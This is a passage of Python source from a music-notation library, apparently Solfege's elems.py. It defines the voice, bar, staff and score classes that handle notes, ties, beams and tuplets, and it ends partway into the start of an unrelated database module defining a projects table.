add a note or rest that is longer than\n the available time in the bar. FIXME: maybe name better, like\n NotEnoughtTimeException or similar.\n \"\"\"\n def __unicode__(self):\n return u\"There is not enough space left in the bar\"\n class NoteDontBelongHere(Exception):\n \"\"\"\n raised if we try to beam notes that does not belong to this voice.\n \"\"\"\n pass\n def __init__(self, parent):\n HasParent.__init__(self, parent)\n # The timelen of the Voice\n self.m_length = Rat(0, 1)\n self.m_tdict = {}\n def copy(self, parent):\n \"\"\"\n Return a copy of this Voice object. We make a copy of the dict and\n the m_length variable, but the dict revers to the same object.\n \"\"\"\n ret = Voice(parent)\n ret.m_length = Rat(self.m_length.m_num, self.m_length.m_den)\n ret.m_tdict = self.m_tdict.copy()\n return ret\n def append(self, elem, stemdir=const.BOTH):\n \"\"\"\n elem - either a MusicElement or a list of MusicElements\n\n Rests or Skips cannot be put in a list.\n\n If elem is a list of MusicElements (that is notes...), then all\n the notes will belong to the same stem when typeset.\n\n Create a new bar if the current bar is full.\n Raise Voice.BarFullException if the last bar is not full, but there\n is not enought room for the element in the bar.\n\n Also call parent so that the whole hierarcy knows about this timepos.\n \"\"\"\n # Verify that if elem is a list, then there should be only Notes in it.\n if isinstance(elem, list):\n if [e for e in elem if not isinstance(e, Note)]:\n raise self.CannotAddException(elem)\n else:\n # Anyway, we want it to be a list, even at len 1 for simplicity\n elem = [elem]\n if isinstance(self.w_parent(), RhythmStaff) and len(elem) > 1:\n raise Voice.NoChordsInRhythmStaffException()\n try:\n bar = self.w_score().get_bar_at(self.m_length)\n except IndexError:\n # IndexError means that self.m_length is after the last bar, this means\n # that the current bar is full.\n bar = self.w_score().add_bar(None)\n if (self.m_length + elem[0].m_duration.get_rat_value() <= bar.end()):\n if isinstance(elem[0], Note):\n # We don't have to set w_parent for the Stem and the notes\n # here, because the Stem constructor does it.\n self.set_elem(Stem(self, elem, stemdir), self.m_length)\n else: # rest or skip\n self.set_elem(elem, self.m_length)\n elem[0].w_parent = weakref.ref(self)\n self.m_length += elem[0].m_duration.get_rat_value()\n else:\n raise self.BarFullException()\n def add_to(self, timepos, note):\n \"\"\"\n Add note to an existing stem at timepos.\n \"\"\"\n assert timepos in self.m_tdict\n assert self.m_tdict[timepos]['elem'][0].m_duration == note.m_duration\n note.w_parent = weakref.ref(self.m_tdict[timepos]['elem'])\n assert isinstance(note.w_parent(), Stem)\n self.m_tdict[timepos]['elem'].append(note)\n def set_elem(self, elem, timepos):\n \"\"\"\n Elem is a one item list containing a Skip or Rest, or Stem (that\n is indeed a list too) containing Notes.\n \"\"\"\n assert isinstance(elem, list)\n if timepos not in self.m_tdict:\n self.m_tdict[timepos] = {}\n self.m_tdict[timepos]['elem'] = elem\n def del_elem(self, timepos):\n \"\"\"\n Delete the element at timepos, move the remaining notes\n in the bar to the left to fill the gap.\n \"\"\"\n assert timepos in self.m_tdict\n bp = BarProxy(self, timepos)\n tp = self.get_timeposes_of(bp.m_bar)[-1]\n # If the last note in the bar is tied to the next bar, then\n # we must untie it.\n if (isinstance(self.m_tdict[tp]['elem'][0], Note)\n and self.m_tdict[tp]['elem'][0].m_tieinfo in ('go', 'start')):\n self.untie_next(tp)\n if isinstance(self.m_tdict[timepos]['elem'][0], Note):\n if self.is_last(timepos):\n self.untie_next(timepos)\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go':\n self.tie_prev_to_next(timepos)\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'end':\n self.untie_prev(timepos)\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'start':\n self.untie_next(timepos)\n del self.m_tdict[timepos]\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n def try_set_elem(self, elem, timepos, insert_mode):\n \"\"\"\n Replace whatever is at timepos with elem.\n Return True if succuessful.\n \"\"\"\n bp = BarProxy(self, timepos)\n if isinstance(self.m_tdict[timepos]['elem'][0], Skip):\n if timepos + elem.m_duration.get_rat_value() <= bp.end():\n if isinstance(elem, Note):\n stem = Stem(self, [elem], const.UP)\n self.set_elem(stem, timepos)\n else:\n self.set_elem([elem], timepos)\n elem.w_parent = weakref.ref(self)\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n return True\n else:\n max_free = bp.get_free_time()\n #flytt til bar-class\n delta = elem.m_duration.get_rat_value() - self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n def fix_ties(prev_timepos, cur_timepos, next_timepos):\n prev_e = self.m_tdict[prev_timepos]['elem'][0] if prev_timepos else None\n cur_e = self.m_tdict[cur_timepos]['elem'][0]\n next_e = self.m_tdict[next_timepos]['elem'][0] if next_timepos else None\n if isinstance(elem, Note):\n t = None\n if prev_timepos and isinstance(prev_e, Note) and prev_e.m_tieinfo in ('go', 'start'):\n t = 'end'\n if isinstance(next_e, Note) and next_e.m_tieinfo in ('go', 'end'):\n if t == 'end':\n t = 'go'\n else:\n t = 'start'\n cur_e.m_tieinfo = t\n else:\n assert isinstance(elem, Rest)\n if prev_timepos and isinstance(prev_e, Note):\n if prev_e.m_tieinfo == 'go':\n prev_e.m_tieinfo = 'end'\n elif prev_e.m_tieinfo == 'start':\n prev_e.m_tieinfo = None\n if isinstance(next_e, Note):\n if next_e.m_tieinfo == 'go':\n next_e.m_tieinfo = 'start'\n elif next_e.m_tieinfo == 'end':\n next_e.m_tieinfo = None\n\n if insert_mode:\n if max_free >= elem.m_duration.get_rat_value():\n tmp_timepos = timepos + Rat(1, 1000000)\n self.m_tdict[tmp_timepos] = self.m_tdict[timepos]\n del self.m_tdict[timepos]\n bp.remove_trailing(elem.m_duration.get_rat_value())\n stem = Stem(self, [elem], const.UP)\n self.set_elem(stem, timepos)\n fix_ties(self.get_prev_timepos(timepos), timepos, tmp_timepos)\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n return True\n if not insert_mode:\n if (max_free >= delta):\n # We have space to add.\n # Delete skips (and rests) from the end of the bar\n # until we have enough space to add the elem.\n if delta > Rat(0, 1):\n bp.remove_trailing(delta)\n stem = Stem(self, [elem], const.UP)\n self.set_elem(stem, timepos)\n fix_ties(self.get_prev_timepos(timepos), timepos, self.get_next_timepos(timepos))\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n return True\n def fill_with_skips(self):\n \"\"\"\n Fill the voice with skips. We assume the voice is empty.\n \"\"\"\n for bar in self.w_score().m_bars:\n bar.fill_skips(self)\n def get_timeposes_of(self, bar):\n \"\"\"\n Return a sorted list of all timeposes in bar in this Voice\n \"\"\"\n v = sorted(self.m_tdict.keys())\n try:\n # this is the fastest way to set start_i\n start_i = v.index(bar.m_timepos)\n except ValueError:\n # but if code has recently removed the timepos, then we have to\n # search for it.\n start_i = 0\n while start_i < len(v) and v[start_i] < bar.m_timepos:\n start_i += 1\n if start_i >= len(v) or v[start_i] >= bar.end():\n start_i = None\n try:\n end_i = v.index(bar.end())\n except ValueError:\n end_i = None\n if start_i == None:\n return []\n elif end_i:\n return v[start_i:end_i]\n else:\n return v[start_i:]\n def get_time_pitch_list(self, bpm):\n \"\"\"\n Return a list of tuples (pitch, duration-in-seconds) of the tones\n and rests in the voice. -1 is used for pitch for rests.\n \"\"\"\n ret = []\n for timepos in sorted(self.m_tdict.keys()):\n # stem is a Stem or [Rest]\n stem = self.m_tdict[timepos]['elem']\n if len(stem) != 1:\n raise Voice.NotUnisonException()\n dur = float(stem[0].m_duration.get_rat_value()) * bpm[1] / bpm[0] * 60\n if isinstance(stem[0], Note):\n ret.append((stem[0].m_musicalpitch.semitone_pitch(), dur))\n elif isinstance(stem[0], Rest):\n ret.append((-1, dur))\n return ret\n def beam(self, notes):\n \"\"\"\n Notes is a list of Note objects, once Note object from each stem\n you want to beam.\n The notes should be in sequence on this Voice. Behaviour if not\n sequential is undefined.\n \"\"\"\n for note in notes:\n try:\n if note.w_parent().w_parent() != self:\n raise self.NoteDontBelongHere()\n except AttributeError:\n raise self.NoteDontBelongHere()\n notes[0].w_parent().m_beaminfo = 'start'\n for n in notes[1:][:-1]:\n n.w_parent().m_beaminfo = 'go'\n notes[-1].w_parent().m_beaminfo = 'end'\n def tie_timepos(self, timepos):\n \"\"\"\n Tie all notes on this timepos that has the same pitch as notes on the\n next timepos. Return True if tie(s) could be added.\n FIXME: The current version of this method only works as expected\n when there is only one notehead on each stem. This because it was\n implemented to create the rhythmwidget.\n \"\"\"\n next_timepos = self.get_next_timepos(timepos)\n # if we are last in the score\n if not next_timepos:\n return\n if not isinstance(self.m_tdict[next_timepos]['elem'][0], Note):\n return\n # Assert there is only one notehead on each stem.\n assert len(self.m_tdict[timepos]['elem']) == 1\n assert len(self.m_tdict[next_timepos]['elem']) == 1\n if self.m_tdict[timepos]['elem'][0].m_musicalpitch == self.m_tdict[next_timepos]['elem'][0].m_musicalpitch:\n self.tie([self.m_tdict[timepos]['elem'][0],\n self.m_tdict[next_timepos]['elem'][0]])\n return True\n def untie_next(self, timepos):\n \"\"\"\n Return True if we removed the tie from timepos to the note after.\n Return False if not.\n \"\"\"\n next_timepos = self.get_next_timepos(timepos)\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'start':\n if self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'end':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = 'start'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go':\n if self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'end':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = 'start'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = 'end'\n else:\n return False\n return True\n def untie_prev(self, timepos):\n \"\"\"\n Remove True if we removed a tie from the prev note to this.\n Return False if not.\n \"\"\"\n prev_timepos = self.get_prev_timepos(timepos)\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'end':\n if self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'start':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = 'end'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go':\n if self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'start':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = 'end'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = 'start'\n def tie_prev_to_next(self, timepos):\n assert self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go'\n assert self.m_tdict[self.get_prev_timepos(timepos)]['elem'][0].m_tieinfo in ('start', 'go')\n assert self.m_tdict[self.get_next_timepos(timepos)]['elem'][0].m_tieinfo in ('end', 'go')\n self.m_tdict[timepos]['elem'][0].m_tieinfo = None\n def tie(self, notes):\n \"\"\"\n The notes should be in sequence on this Voice. Behaviour if not\n sequential is undefined.\n \"\"\"\n for note in notes:\n # FIXME common with beam\n try:\n if note.w_parent().w_parent() != self:\n raise self.NoteDontBelongHere()\n except AttributeError:\n raise self.NoteDontBelongHere()\n if notes[0].m_tieinfo == 'end':\n notes[0].m_tieinfo = 'go'\n elif notes[0].m_tieinfo is None:\n notes[0].m_tieinfo = 'start'\n for n in notes[1:][:-1]:\n n.m_tieinfo = 'go'\n # This conditional is true when notes 2 and 3 are tied, and the\n # editor ties note 1 and note 2.\n if notes[-1].m_tieinfo == 'start':\n notes[-1].m_tieinfo = 'go'\n elif notes[-1].m_tieinfo is None:\n notes[-1].m_tieinfo = 'end'\n def tuplet(self, ratio, direction, notes):\n \"\"\"\n ratio - a Rat, for example Rat(2, 3) for normal triplets.\n direction - const.UP, const.DOWN or const.BOTH\n notes - a list of Note objects, once Note object from each stem\n you want to have a visible tuplet engraver.\n The notes should be in sequence on this Voice. Behaviour if not\n sequential is undefined.\n \"\"\"\n for note in notes:\n # FIXME common with beam\n try:\n if note.w_parent().w_parent() != self:\n raise self.NoteDontBelongHere()\n except AttributeError:\n raise self.NoteDontBelongHere()\n if notes[0].w_parent().m_tupletinfo == 'end':\n notes[0].w_parent().m_tupletinfo = 'go'\n else:\n notes[0].w_parent().m_tupletinfo = 'start'\n notes[0].w_parent().m_tuplet_dir = direction\n notes[0].w_parent().m_tuplet_ratio = ratio\n for n in notes[1:][:-1]:\n n.w_parent().m_tupletinfo = 'go'\n notes[-1].w_parent().m_tupletinfo = 'end'\n def set_clef(self, clef):\n \"\"\"\n Set the clef that will be inserted into the staff before the next\n music element.\n \"\"\"\n self.w_parent().set_clef(clef, self.m_length)\n def set_key_signature(self, keysig):\n \"\"\"\n Call the Staff and set the key signature at the timepos the next\n tone will be added to this voice.\n \"\"\"\n self.w_parent().set_key_signature(keysig, self.m_length)\n def is_bar_full(self):\n \"\"\"\n Return True if this the next tone will be placed on the first beat\n of a bar. This means that there are either nothing in the voice at\n all, or the current bar is full.\n \"\"\"\n try:\n bar = self.w_score().get_bar_at(self.m_length)\n return bar.m_timepos == self.m_length\n except IndexError:\n return True\n def get_prev_timepos(self, timepos):\n \"\"\"\n Return the previous timepos. Return None if this is the first\n timepos in the voice.\n \"\"\"\n assert timepos in self.m_tdict\n v = sorted(self.m_tdict.keys())\n i = v.index(timepos)\n if i > 0:\n return v[i - 1]\n def get_next_timepos(self, timepos):\n \"\"\"\n Return the next timepos. Return None if this is the last timepos\n in the Voice.\n \"\"\"\n assert timepos in self.m_tdict\n v = sorted(self.m_tdict.keys())\n i = v.index(timepos)\n if i +1 < len(v):\n return v[i + 1]\n def get_timelist(self):\n retval = []\n for timepos in sorted(self.m_tdict.keys()):\n if isinstance(self.m_tdict[timepos]['elem'][0], Rest):\n if retval[-1][0] == False:\n retval[-1][1] += self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n else:\n retval.append([False, self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()])\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'start':\n nlen = self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'continue':\n nlen += self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n else:\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'end':\n nlen += self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n else:\n nlen = self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n retval.append([isinstance(self.m_tdict[timepos]['elem'][0], Note),\n nlen])\n nlen = None\n return retval\n def is_last(self, timepos):\n \"\"\"\n Return a bool telling if the elem at timepos is the last in the\n bar and fill it, so that the next elem has to be the first in the\n next bar.\n \"\"\"\n return self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value() + timepos == self.w_score().get_bar_at(timepos).end()\n def __getitem__(self, idx):\n v = sorted(self.m_tdict)\n return self.m_tdict[v[idx]]\n\nclass Bar(object):\n def __init__(self, timesig, timepos):\n \"\"\"\n Time signature is the time signature of the bar. It does not\n necessarily mean that we will engrave a time signature on the\n score. All bar objects need to know their length.\n\n timepos is the time of the first music in the bar. So timepos\n + timesig will be the position of the next bar.\n \"\"\"\n assert isinstance(timesig, TimeSignature)\n assert isinstance(timepos, Rat)\n self.m_timesig = timesig\n self.m_timepos = timepos\n def end(self):\n return self.m_timepos + self.m_timesig.as_rat()\n def fill_skips(self, voice):\n \"\"\"\n Add Skips at the end of the bar, so that it is filled.\n We assume that any elements already added are placed at\n the correct timepos.\n \"\"\"\n # nt = short for \"next timepos\", the timepos to start fill skips to\n if voice.get_timeposes_of(self):\n nt = voice.get_timeposes_of(self)[-1]\n nt = nt + voice.m_tdict[nt]['elem'][0].m_duration.get_rat_value()\n else:\n # we get here if the bar is empty\n nt = self.m_timepos\n default_skip = Rat(1, 4)\n # pos within default skip\n pp = nt - int (nt / default_skip) * default_skip\n if pp != Rat(0, 1):\n # Here we add a skip so that the next column will be X times\n # default_skip\n voice.set_elem([Skip(Duration.new_from_rat(default_skip - pp))],\n nt)\n nt += (default_skip - pp)\n # And the we fill the bar with Skips as long as default_skip.\n while nt < self.end():\n voice.set_elem([Skip(Duration.new_from_rat(default_skip))], nt)\n nt += default_skip\n def get_free_time(self, voice):\n \"\"\"\n Return the duration, as a Rat value, on the end of the bar\n consisting of Rests and Skips.\n \"\"\"\n d = Rat(0, 1)\n for timepos in reversed(voice.get_timeposes_of(self)):\n if not isinstance(voice.m_tdict[timepos]['elem'][0], (Skip, Rest)):\n break\n d += voice.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n return d\n def pop_last_elem(self, voice):\n \"\"\"\n Remove the last element form the voice, and return its\n duration as a Rat.\n \"\"\"\n timepos = voice.get_timeposes_of(self)[-1]\n ret = voice.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n del voice.m_tdict[timepos]\n return ret\n def remove_skips(self, voice):\n \"\"\"\n Remove the skips from the bar, if any.\n Leave bar in inconsistent state. Need bar.repack or similar after\n calling this method.\n \"\"\"\n for t in voice.get_timeposes_of(self):\n if isinstance(voice.m_tdict[t]['elem'][0], Skip):\n del voice.m_tdict[t]\n def remove_trailing(self, voice, duration):\n \"\"\"\n Remove elements from the end of the bar, until their duration\n is a least 'duration' long.\n \"\"\"\n assert isinstance(duration, Rat)\n total = Rat(0, 1)\n while total < duration:\n total += self.pop_last_elem(voice)\n def repack(self, voice):\n \"\"\"\n Call this method to cleanup m_tdict for the bar after keys\n from m_tict have ben deleted. Example before bar.repack:\n 0/4: Note\n 1/4: Rest\n 1/2: Note\n\n then del m_tdict[Rat(1, 4)] make the content of tdict look like this:\n 0/4: Note\n 1/2: Note\n\n Calling bar.repack will repack is like this:\n 0/4: Note\n 1/4: Note\n\n NOTE: This method does not add or remove any elements, including Skips\n \"\"\"\n timeposes = voice.get_timeposes_of(self)\n if timeposes:\n last_is_last = voice.is_last(timeposes[-1])\n else:\n last_is_last = None\n corrected_timepos = self.m_timepos\n mods = {}\n for t in voice.get_timeposes_of(self):\n if t != corrected_timepos:\n mods[corrected_timepos] = t\n corrected_timepos += voice.m_tdict[t]['elem'][0].m_duration.get_rat_value()\n if corrected_timepos > self.end():\n raise voice.BarFullException()\n if mods:\n # This conditional is true if the elem we are replacing is shorter\n # than the new one. We must select the correct order to adjust the\n # timeposes so we don't overwrite values\n if mods.items()[0][0] < mods.items()[0][1]:\n keys = sorted(mods.keys())\n else:\n keys = reversed(sorted(mods.keys()))\n for n in keys:\n assert n not in voice.m_tdict\n voice.m_tdict[n] = voice.m_tdict[mods[n]]\n del voice.m_tdict[mods[n]]\n # If the last note is not filling the bar any more, then we must\n # remove the tie.\n if last_is_last:\n timeposes = voice.get_timeposes_of(self)\n if (timeposes and not voice.is_last(timeposes[-1])\n and isinstance(voice.m_tdict[timeposes[-1]]['elem'][0], Note)\n and voice.m_tdict[timeposes[-1]]['elem'][0].m_tieinfo in ('go', 'start')):\n voice.untie_next(timeposes[-1])\n def __repr__(self):\n return \"<%s %i/%i %s at %s>\" % (str(self.__class__).split(\".\")[-1][:-2], self.m_timesig.m_num,\n self.m_timesig.m_den, self.m_timepos, hex(id(self)))\n\nclass PartialBar(Bar):\n def __init__(self, duration, timesig, timepos):\n Bar.__init__(self, timesig, timepos)\n assert isinstance(duration, Duration)\n self.m_duration = duration\n def end(self):\n return self.m_timepos + self.m_duration.get_rat_value()\n\nclass BarProxy(object):\n def __init__(self, voice, timepos):\n self.m_voice = voice\n self.m_bar = voice.w_parent().w_parent().get_bar_at(timepos)\n def __getattr__(self, attr):\n if attr == 'end':\n return self.m_bar.end\n return lambda *f: getattr(self.m_bar, attr)(self.m_voice, *f)\n\nclass _StaffCommon(HasParent):\n \"\"\"\n A voice is added to the staff when it is created.\n \"\"\"\n def __init__(self, parent):\n assert isinstance(parent, Score)\n HasParent.__init__(self, parent)\n self.m_voices = []\n self.add_voice()\n # I think the only things stored in Staff.m_tdict are \"clef\" and\n # \"keysig\". We don't store time signature changes where, since\n # Score.m_bars take care about that.\n self.m_tdict = {}\n def copy(self, parent):\n staff = self.__class__(parent)\n staff.m_voices = [v.copy(staff) for v in self.m_voices]\n staff.m_tdict = self.m_tdict.copy()\n return staff\n def add_voice(self):\n self.m_voices.append(Voice(self))\n self.w_score().create_shortcuts()\n return self.m_voices[-1]\n def get_timeposes(self):\n \"\"\"\n Return a sorted list of all timeposes in the staff.\n We generate the list by checking all timeposes added to the\n staff because of Clefs and TimeSignatures, and then all timeposes\n in the voices.\n \"\"\"\n timeposes = set()\n for has_timeposes in self.m_voices + [self]:\n [timeposes.add(t) for t in has_timeposes.m_tdict]\n return sorted(timeposes)\n def get_timelist(self):\n data = {}\n for voice_idx, voice in enumerate(self.m_voices):\n for timepos in voice.m_tdict:\n n = voice.m_tdict[timepos]['elem'][0]\n if isinstance(n, Note):\n if timepos not in data:\n data[timepos] = {'start': set(), 'end': set()}\n data[timepos]['start'].add(voice_idx)\n endpos = timepos + n.m_duration.get_rat_value()\n if endpos not in data:\n data[endpos] = {'start': set(), 'end': set()}\n data[endpos]['end'].add(voice_idx)\n retval = []\n v = sorted(data)[:]\n ppos = Rat(0, 1)\n voices = set()\n for timepos in v:\n if data[timepos]['start'] and data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n for voice in data[timepos]['start']:\n voices.add(voice)\n assert voices\n retval.append([True, timepos - ppos])\n ppos = timepos\n elif data[timepos]['start']:\n if not voices:\n ppos = timepos\n else:\n retval.append([True, timepos - ppos])\n ppos = timepos\n for voice in data[timepos]['start']:\n voices.add(voice)\n elif data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n if not voices:\n retval.append([True, timepos - ppos])\n return retval\n def set_property(self, timepos, name, value):\n d = self.m_tdict.setdefault(timepos, {})\n properties = d.setdefault('properties', {})\n properties[name] = value\n\nclass Staff(_StaffCommon):\n def __init__(self, parent):\n _StaffCommon.__init__(self, parent)\n self.set_clef(\"violin\", Rat(0, 1))\n def set_clef(self, clef, timepos):\n if timepos not in self.m_tdict:\n self.m_tdict[timepos] = {}\n self.m_tdict[timepos]['clef'] = Clef(clef)\n def set_key_signature(self, keysig, timepos):\n if timepos not in self.m_tdict:\n self.m_tdict[timepos] = {}\n self.m_tdict[timepos]['keysig'] = keysig\n\n\nclass RhythmStaff(_StaffCommon):\n \"\"\"\n We don't implement set_clef since there should be no clefs on a\n rhythm staff.\n \"\"\"\n class OnlyOneVoiceException(Exception):\n pass\n def __init__(self, parent):\n _StaffCommon.__init__(self, parent)\n def add_voice(self):\n if len(self.m_voices) == 1:\n raise self.OnlyOneVoiceException()\n _StaffCommon.add_voice(self)\n def set_key_signature(self, keysig, timepos):\n \"\"\"\n RhythmStaffs don't have key signatures.\n \"\"\"\n return\n\n\nclass Score(object):\n class ConcatException(Exception):\n pass\n class StaffCountException(ConcatException):\n pass\n class StaffTypeException(ConcatException):\n pass\n class VoiceCountException(ConcatException):\n pass\n def __init__(self):\n self.m_staffs = []\n self.m_bars = []\n def copy(self):\n score = Score()\n score.m_staffs = [s.copy(score) for s in self.m_staffs]\n score.m_bars = copy.deepcopy(self.m_bars)\n return score\n def add_staff(self, staff_class=Staff):\n self.m_staffs.append(staff_class(self))\n self.create_shortcuts()\n return self.m_staffs[-1]\n def create_shortcuts(self):\n \"\"\"\n (Re)create the voice and staff shortcuts.\n \"\"\"\n # shortcut that is nice to people using the API directly.\n for staff_idx, staff in enumerate(self.m_staffs):\n setattr(self, \"staff%i\" % (staff_idx + 1), staff)\n for voice_idx, voice in enumerate(staff.m_voices):\n setattr(self, \"voice%i%i\" % (staff_idx + 1, voice_idx + 1), voice)\n def _get_new_bar_timepos(self):\n \"\"\"\n Return the timepos where the next bar will be added.\n \"\"\"\n if self.m_bars:\n return self.m_bars[-1].end()\n return Rat(0, 1)\n def _get_new_bar_timesig(self, timesig):\n \"\"\"\n Return the time signature the next bar will get.\n \"\"\"\n if timesig:\n return timesig\n elif self.m_bars:\n return self.m_bars[-1].m_timesig\n else:\n return TimeSignature(4, 4)\n def add_bar(self, timesig):\n \"\"\"\n If timesig is None, then we use the same timesig as the last bar.\n Return the added bar.\n \"\"\"\n self.m_bars.append(Bar(\n self._get_new_bar_timesig(timesig), self._get_new_bar_timepos()))\n return self.m_bars[-1]\n def add_partial_bar(self, duration, timesig):\n \"\"\"\n Set to the duration of the pickup bar if we want one.\n This must be called before bars are added with Score.add_bar\n \"\"\"\n self.m_bars.append(PartialBar(duration,\n self._get_new_bar_timesig(timesig), self._get_new_bar_timepos()))\n return self.m_bars[-1]\n def get_bar_at(self, timepos):\n \"\"\"\n Return the bar timepos is within. Raise IndexError if timepos\n is after the last bar.\n \"\"\"\n for bar in self.m_bars:\n if bar.m_timepos <= timepos < bar.end():\n return bar\n if bar.m_timepos > timepos:\n return IndexError(timepos)\n raise IndexError(timepos)\n def get_timelist(self):\n data = {}\n for staff_idx, staff in enumerate(self.m_staffs):\n for voice_idx, voice in enumerate(staff.m_voices):\n for timepos in voice.m_tdict:\n n = voice.m_tdict[timepos]['elem'][0]\n if isinstance(n, Note):\n if timepos not in data:\n data[timepos] = {'start': set(), 'end': set()}\n if n.m_tieinfo not in ('go', 'end'):\n data[timepos]['start'].add((staff_idx, voice_idx))\n if n.m_tieinfo in (None, 'end'):\n endpos = timepos + n.m_duration.get_rat_value()\n if endpos not in data:\n data[endpos] = {'start': set(), 'end': set()}\n data[endpos]['end'].add((staff_idx, voice_idx))\n retval = []\n v = sorted(data)[:]\n ppos = Rat(0, 1)\n voices = set()\n for timepos in v:\n if data[timepos]['start'] and data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n for voice in data[timepos]['start']:\n voices.add(voice)\n assert voices\n retval.append([True, timepos - ppos])\n ppos = timepos\n elif data[timepos]['start']:\n if not voices:\n if (timepos != ppos):\n retval.append([False, timepos - ppos])\n ppos = timepos\n else:\n retval.append([True, timepos - ppos])\n ppos = timepos\n for voice in data[timepos]['start']:\n voices.add(voice)\n elif data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n if not voices:\n retval.append([True, timepos - ppos])\n ppos = timepos\n return retval\n @staticmethod\n def concat(s1, s2):\n \"\"\"\n Concatenate the two scores, and return a new score. Both scores\n need to have the exact same staff and voice layout.\n \"\"\"\n assert isinstance(s1, Score)\n assert isinstance(s2, Score)\n if len(s1.m_staffs) != len(s2.m_staffs):\n raise Score.StaffCountException()\n if [type(x) for x in s1.m_staffs] != [type(x) for x in s2.m_staffs]:\n raise Score.StaffTypeException()\n for st1, st2 in zip(s1.m_staffs, s2.m_staffs):\n if len(st1.m_voices) != len(st2.m_voices):\n raise Score.VoiceCountException()\n ret = s1.copy()\n if not s1.m_staffs:\n return s1\n # do the adding\n for bar in s2.m_bars:\n bar.m_timepos = ret.m_bars[-1].end()\n ret.m_bars.append(bar)\n ret.create_shortcuts()\n if s1.m_bars:\n start = s1.m_bars[-1].end()\n else:\n start = Rat(0, 1)\n s2.create_shortcuts() # FIXME why?\n for staff_idx, staff in enumerate(s1.m_staffs):\n for voice_idx in range(len(staff.m_voices)):\n for k in s2.m_staffs[staff_idx].m_voices[voice_idx].m_tdict:\n ret.m_staffs[staff_idx].m_voices[voice_idx].m_tdict[k + start] = s2.m_staffs[staff_idx].m_voices[voice_idx].m_tdict[k]\n return ret\n @staticmethod\n def concat2(s1, s2):\n \"\"\"\n Return a new Score object concatenating the two scores. This is\n intended return value is intended for playback only, since the\n staffs placed below each other. So the first score will have empty\n bars at the end, and the last score will have empty bars at the\n beginning.\n \"\"\"\n assert isinstance(s1, Score)\n assert isinstance(s2, Score)\n ret = s1.copy()\n if s1.m_bars:\n start = s1.m_bars[-1].end()\n else:\n start = Rat(0, 1)\n for bar in s2.m_bars:\n ret.m_bars.append(Bar(bar.m_timesig, ret.m_bars[-1].end()))\n for staff_idx, staff in enumerate(s2.m_staffs):\n ret.add_staff(staff_class=staff.__class__)\n for k in staff.m_tdict:\n ret.m_staffs[-1].m_tdict[start + k] = staff.m_tdict[k]\n for voice_idx in range(len(staff.m_voices)):\n if voice_idx != 0:\n ret.m_staffs[-1].add_voice()\n # This line make the music from sc2 continue after the\n # point where the music from sc1 ends.\n ret.m_staffs[-1].m_voices[-1].m_length = s1.m_bars[-1].end()\n for elem in s2.m_staffs[staff_idx].m_voices[voice_idx]:\n ret.m_staffs[-1].m_voices[-1].append(elem['elem'])\n ret.create_shortcuts()\n return ret\n def __deepcopy__(self, memo):\n ret = Score()\n ret.m_bars = copy.deepcopy(self.m_bars)\n return ret\n","repo_name":"rannyeribaptist/Solfege","sub_path":"solfege/mpd/elems.py","file_name":"elems.py","file_ext":"py","file_size_in_byte":46216,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"12594662029","text":"from db.db import get_cursor, commit_db\nfrom uuid import uuid4\nfrom json import dumps\n\nCREATE_TABLE_PROJECTS_SQL = \"\"\"\nCREATE TABLE IF NOT EXISTS projects (\n uuid GUID PRIMARY KEY ,\n id INTEGER unique,\n name TEXT unique,\n build_branch varchar,\n pipeline_steps json, \n pipeline_envs json, \n info json )\"\"\"\n\nSELECT_PROJECTS_SQL = \"\"\" SELECT * from projects LIMIT ? 